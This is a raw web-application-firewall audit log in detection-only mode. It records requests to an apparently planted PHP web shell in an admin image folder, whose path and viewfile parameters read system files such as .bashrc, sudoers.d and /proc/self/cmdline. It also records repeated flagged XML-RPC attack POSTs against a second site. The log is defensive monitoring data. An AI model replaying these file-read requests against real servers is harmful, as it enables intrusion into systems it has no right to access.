Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --dd2dcf34-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4745 Connection: close Content-Type: text/html; charset=UTF-8 --dd2dcf34-H-- Message: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /proc/self/root/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /proc/self/root/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBtF5lL5_2Zd8wUdfLLjAAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101271717786 4865 (- - -) Stopwatch2: 1750101271717786 4865; combined=2187, p1=352, p2=1692, p3=44, p4=38, p5=61, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd2dcf34-Z-- --99999015-A-- [17/Jun/2025:00:44:32.858432 +0530] aFBtGOXoYMV_efWvDnDV6wAAAAI 216.73.216.71 41164 127.0.0.1 7081 --99999015-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet%2Fudplite HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --99999015-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3053 Connection: close Content-Type: text/html; charset=UTF-8 --99999015-H-- Message: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udplite"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udplite"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBtGOXoYMV_efWvDnDV6wAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101272854210 4277 (- - -) Stopwatch2: 1750101272854210 4277; combined=2202, p1=357, p2=1706, p3=33, p4=39, p5=67, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --99999015-Z-- --3a796212-A-- [17/Jun/2025:00:44:49.711133 +0530] aFBtKY3q6eGJ2xNcTd6JgQAAAAU 216.73.216.71 57584 127.0.0.1 7081 --3a796212-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsudoers.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsudoers.d%2FREADME HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3a796212-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2995 Connection: close Content-Type: text/html; charset=UTF-8 --3a796212-H-- Message: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /snap/core20/2599/etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /snap/core20/2599/etc/sudoers.d/readme"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /snap/core20/2599/etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBtKY3q6eGJ2xNcTd6JgQAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /snap/core20/2599/etc/sudoers.d/readme"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBtKY3q6eGJ2xNcTd6JgQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101289706799 4388 (- - -) Stopwatch2: 1750101289706799 4388; combined=2477, p1=363, p2=1951, p3=45, p4=32, p5=86, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a796212-Z-- --1afe575f-A-- [17/Jun/2025:00:45:04.412496 +0530] aFBtN03CmevS3xeTzmol6QAAAAQ 34.68.37.79 36880 127.0.0.1 7081 --1afe575f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --1afe575f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1afe575f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBtN03CmevS3xeTzmol6QAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101303707001 705569 (- - -) Stopwatch2: 1750101303707001 705569; combined=2521, p1=396, p2=1567, p3=57, p4=69, p5=261, sr=99, sw=171, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1afe575f-Z-- --5cd5cc43-A-- [17/Jun/2025:00:46:04.279410 +0530] aFBtcx6Azi2u_ik2Q3KsAwAAAAY 34.68.37.79 59588 127.0.0.1 7081 --5cd5cc43-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5cd5cc43-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5cd5cc43-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBtcx6Azi2u_ik2Q3KsAwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101363591906 687561 (- - -) Stopwatch2: 1750101363591906 687561; combined=2590, p1=487, p2=1639, p3=47, p4=80, p5=207, sr=173, sw=130, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5cd5cc43-Z-- --b0169c69-A-- [17/Jun/2025:00:46:45.652741 +0530] aFBtne2BajTuKRK3FvJ97wAAAAE 216.73.216.71 49444 127.0.0.1 7081 --b0169c69-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fskel&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fskel%2F.bashrc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b0169c69-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4751 Connection: close Content-Type: text/html; charset=UTF-8 --b0169c69-H-- Message: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /snap/core20/2582/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /snap/core20/2582/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBtne2BajTuKRK3FvJ97wAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101405648023 4778 (- - -) Stopwatch2: 1750101405648023 4778; combined=2350, p1=383, p2=1832, p3=40, p4=39, p5=56, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b0169c69-Z-- --6b172e09-A-- [17/Jun/2025:00:47:04.099867 +0530] aFBtr-XoYMV_efWvDnDWfwAAAAI 34.68.37.79 39488 127.0.0.1 7081 --6b172e09-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6b172e09-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6b172e09-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBtr-XoYMV_efWvDnDWfwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101423319573 780383 (- - -) Stopwatch2: 1750101423319573 780383; combined=158301, p1=493, p2=1952, p3=49, p4=68, p5=77907, sr=135, sw=128, l=0, gc=77704 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b172e09-Z-- --3a4fec09-A-- [17/Jun/2025:00:47:30.220918 +0530] aFBtyn3hoSwVUy254pH3cgAAACQ 216.73.216.71 36602 127.0.0.1 7081 --3a4fec09-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fskel&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fskel%2F.bashrc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3a4fec09-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4751 Connection: close Content-Type: text/html; charset=UTF-8 --3a4fec09-H-- Message: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /snap/core20/2599/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /snap/core20/2599/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBtyn3hoSwVUy254pH3cgAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101450216164 4810 (- - -) Stopwatch2: 1750101450216164 4810; combined=2368, p1=368, p2=1861, p3=38, p4=40, p5=61, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a4fec09-Z-- --36fb7529-A-- [17/Jun/2025:00:47:37.423481 +0530] aFBt0Y3q6eGJ2xNcTd6KFgAAAAU 216.73.216.71 37534 127.0.0.1 7081 --36fb7529-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Fnamespace.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --36fb7529-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3681 Connection: close Content-Type: text/html; charset=UTF-8 --36fb7529-H-- Message: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /proc/self/root/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /proc/self/root/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBt0Y3q6eGJ2xNcTd6KFgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101457419459 4077 (- - -) Stopwatch2: 1750101457419459 4077; combined=2046, p1=375, p2=1554, p3=30, p4=32, p5=55, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --36fb7529-Z-- --4919bb74-A-- [17/Jun/2025:00:48:04.263058 +0530] aFBt633hoSwVUy254pH3jQAAACQ 34.68.37.79 42768 127.0.0.1 7081 --4919bb74-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --4919bb74-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4919bb74-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBt633hoSwVUy254pH3jQAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101483523674 739466 (- - -) Stopwatch2: 1750101483523674 739466; combined=2569, p1=365, p2=1456, p3=60, p4=87, p5=391, sr=102, sw=210, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4919bb74-Z-- --4f444b28-A-- [17/Jun/2025:00:48:24.584019 +0530] aFBuAJVkCcfT-Z8NQYyYGAAAAAc 216.73.216.71 46440 127.0.0.1 7081 --4f444b28-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2Fphpenv.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4f444b28-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3534 Connection: close Content-Type: text/html; charset=UTF-8 --4f444b28-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/phpenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuAJVkCcfT-Z8NQYyYGAAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/phpenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuAJVkCcfT-Z8NQYyYGAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101504580044 4029 (- - -) Stopwatch2: 1750101504580044 4029; combined=2170, p1=372, p2=1640, p3=36, p4=29, p5=93, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4f444b28-Z-- --ed244c15-A-- [17/Jun/2025:00:48:26.495172 +0530] aFBuAuXoYMV_efWvDnDWvAAAAAI 216.73.216.71 46702 127.0.0.1 7081 --ed244c15-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Fcmdline HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ed244c15-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2995 Connection: close Content-Type: text/html; charset=UTF-8 --ed244c15-H-- Message: Warning. Matched phrase "proc/self/cmdline" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/cmdline found within ARGS:viewfile: /proc/self/root/proc/self/cmdline"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/cmdline" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/cmdline found within ARGS:viewfile: /proc/self/root/proc/self/cmdline"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuAuXoYMV_efWvDnDWvAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101506491226 4009 (- - -) Stopwatch2: 1750101506491226 4009; combined=2076, p1=346, p2=1601, p3=38, p4=36, p5=55, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed244c15-Z-- --511d2508-A-- [17/Jun/2025:00:48:26.950843 +0530] aFBuApVkCcfT-Z8NQYyYHAAAAAc 216.73.216.71 46780 127.0.0.1 7081 --511d2508-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Fnamespace.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --511d2508-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3610 Connection: close Content-Type: text/html; charset=UTF-8 